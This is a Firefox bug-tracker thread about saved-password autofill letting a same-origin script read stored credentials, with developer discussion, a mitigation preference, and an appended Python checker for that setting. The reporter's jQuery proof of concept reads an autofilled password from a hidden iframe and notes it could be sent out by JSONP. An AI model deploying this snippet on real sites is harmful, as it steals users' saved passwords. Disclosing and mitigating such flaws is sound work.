Closed Bug 693795 Opened 13 years ago Closed 11 years ago

steal the memorized password

Categories

(Firefox :: Security, defect)

x86
All
defect
Not set
major

RESOLVED DUPLICATE of bug 534541

People

(Reporter: admin, Unassigned)

Details

The vulnerability can steal the memorized password from the authorization form (common domain on a site with malicious code and on the site with the authorization form (same origin policy)).

Firefox 3.6.13 .. 7.0.1, 10.0a1 nightly
Chrome 14.0.835.202 m
Operating System: Windows 7, Windows XP SP3 Pro

//Example in jQuery:
<iframe src="/admin" id="frame" style="display:none;"></iframe>
<script type="text/javascript">
$(document).ready(function(){
  $('#frame').load(function(){
    var pass = $('#frame').contents().find('input[name="password"]').val();
    alert(pass); // (or send a crossdomain JSONP request)
  });
});
</script>

I don't understand what the problem is: if you have malicious code running on your site, you've already lost. Of course your site can access the password field!

Not every page has a password field, but if a malicious script creates one Firefox will helpfully fill it in for you. Without that feature attackers would have to actively phish the user into knowingly entering the password (or using something like Opera's wand), and if the user knows they're already logged in that job gets harder.

We have a bug on this somewhere. The interim solution is to set the preference signon.autofillForms to false, so users have to interact with a password field before the password manager will fill it in. At that point it can still be stolen, but that's the same as every browser in existence.
Group: core-security
Whiteboard: DUPEME
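
One way to check the interim mitigation described above on a machine, as an added example that is not part of the original bug thread: it reads a Firefox profile's prefs.js and user.js and reports whether signon.autofillForms still allows filling without user interaction. The function names are hypothetical, and treating an unset preference as true (autofill on) is an assumption.

```python
import re
from pathlib import Path

PREF = "signon.autofillForms"
# Assumption: when the preference is absent from the profile, Firefox falls
# back to its built-in default, which fills saved logins without interaction.
ASSUMED_DEFAULT = True

# Matches lines such as: user_pref("signon.autofillForms", false);
# Lines commented out with // do not match because of the ^\s* anchor.
PREF_LINE = re.compile(
    r'^\s*user_pref\(\s*"(?P<name>[^"]+)"\s*,\s*(?P<value>.+?)\s*\)\s*;')


def read_bool_pref(text, name):
    """Return the last boolean value set for `name` in prefs text, or None."""
    value = None
    for line in text.splitlines():
        m = PREF_LINE.match(line)
        if m and m.group("name") == name and m.group("value") in ("true", "false"):
            value = m.group("value") == "true"
    return value


def effective_autofill(prefs_js="", user_js=""):
    """user.js is applied at startup and overrides prefs.js; else the default."""
    for text in (user_js, prefs_js):
        value = read_bool_pref(text, PREF)
        if value is not None:
            return value
    return ASSUMED_DEFAULT


def audit_profile(profile_dir):
    """Return (profile name, True if passwords are filled without interaction)."""
    profile = Path(profile_dir)
    texts = []
    for fname in ("prefs.js", "user.js"):
        f = profile / fname
        texts.append(f.read_text(encoding="utf-8", errors="replace") if f.is_file() else "")
    return profile.name, effective_autofill(*texts)


if __name__ == "__main__":
    # Constructed sample input, not taken from a real profile.
    sample_prefs = 'user_pref("browser.startup.page", 3);\n'
    sample_user = '// hardening\nuser_pref("signon.autofillForms", false);\n'
    print("prefs.js only:", effective_autofill(sample_prefs))
    print("with user.js :", effective_autofill(sample_prefs, sample_user))
```

A result of True means the profile still fills saved passwords into any matching form on page load.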
Dupe for Bug 534541?
As per comment 3.

This bug will only apply when there's an MITM going on, and that's what bug 534541 is about.
Status: UNCONFIRMED → RESOLVED
Closed: 11 years ago
Resolution: --- → DUPLICATE
Whiteboard: DUPEME